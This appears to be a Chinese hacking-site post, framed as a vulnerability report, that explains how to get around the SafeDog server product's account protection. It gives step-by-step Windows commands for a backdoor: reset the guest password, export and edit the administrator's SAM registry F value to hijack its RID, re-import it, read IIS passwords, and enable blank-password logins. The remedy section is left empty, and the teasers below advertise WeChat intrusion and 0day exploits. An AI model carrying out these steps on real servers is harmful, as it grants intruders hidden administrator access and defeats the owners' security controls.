绕过安全狗用户限制提权

hacker5年前黑客文章1001
简要描述:

你还在为有安全狗而不能添加用户而烦恼么?那快来看~只需三步,在最新服务器安全狗4.0.05221账号保护全开的状态下,我是如何用guest获取登陆权限的.前提是要有提权exp哦~

详细说明:

服务器安全狗,在账户保护全开的状态下,是不可以添加用户的,但是并没有限制查看和修改密码的权限,这个是不容否认的,就算不允许修改密码,也可以读出iis用户密码明文,那么安全狗账户限制就如同虚设~

打狗棍法之一式
首先,用guest,演示一下,具体操作是通过注册表,篡改sam下用户的F值,使其达到管理权限.

首先,你必须有提权的exp,使自己达到system权限,大家都知道,administrator对应值是1F4,GUEST是1F5,如果有例外,下面会讲到。

下面是步骤:

1.使用net1 user guset 1 ,将guest密码重置为1,无需过问是否禁用

2.reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "x:\1.reg"


导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。

3.使用regedit /s x:/1.reg 导入注册表就可以使用,guest 密码 1登陆了。

安全狗说:账户保护全开的情况下,如果不能更改密码呢?!

再打狗棍法第二式如果真的不能更改密码呢?则使用vbs查看iis用户密码,再使用
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用户名" "x:\2.reg"

查看其对应值,再重复以上第二步和第三步,使用查看到的明文密码登陆安全狗又说:

果不允许修改密码,iis用户是禁止登陆远程桌面的呢?
如:打狗棍法第三式
对啊,我们该怎么办?继续听我说,大家都知道guest是空密码,那我们就使用空密码登陆。
执行
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f


修改limitblankpassworduse值为1,重复上面第二第三步骤,继续登陆。

oh ye~


漏洞证明:

修复方案:

你们更专业。


标签: 黑客技术

相关文章

OpenVPN是不是适用全部电脑操作系统?

OpenVPN是不是适用全部电脑操作系统?

什么叫OpenVPN? OpenVPN是OpenVPN科研开发的火爆和普遍应用的黑客工具。该网络信息安全机构致力于建立互联网络手机软件,容许客户以靠谱和可拓展的方法安全性地开展通讯。OpenVPN的...

Webscan360的防御与绕过

Webscan360的防御与绕过

这两天给360做了一个webscan360的总结,结果补丁还没有出来,就被人公布到了91org上面,既然公开了,那我就做一个总结 首先我们贴上它最新的防御正则 \<.+javascr...

教你如何入侵别人微信,黑客厉害程度堪比电影

公共互联网威胁的定量评估。微信公共互联网威胁量化是一项为企业提供实时、客观的网络安全风险量化风险评估服务。通过微信小程序,可以直观地呈现企业网络安全指标、安全等级、详细安全问题等信息。 它不仅反映了...

[转]N点商业版通杀0day 以及利用方法

作者:qingran 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个:   www.xxxx.com 修改链接:http://w...

学好应用Striker等于你也就会应用了17个网络黑客专业技

学好应用Striker等于你也就会应用了17个网络黑客专业技

Striker是一个让人抵触的信息内容和漏洞扫描器。只必须了解网站域名,就可以完成自动化技术信息收集和漏洞检测;针对初学者非常的合适!   作用 只应向Striker出示网站域名,它便会全...

镜像劫持、网马详细介绍

镜像劫持、网马详细介绍

今日,有一位网民问了我一个难题,他自己早已拥有网址了,如今他想制成“镜像劫持”这类网址,要是开启它,电脑上就会有将会感柒木马程序。   木马病毒是必须开启才有实际效果的,开启标准:要不蒙骗...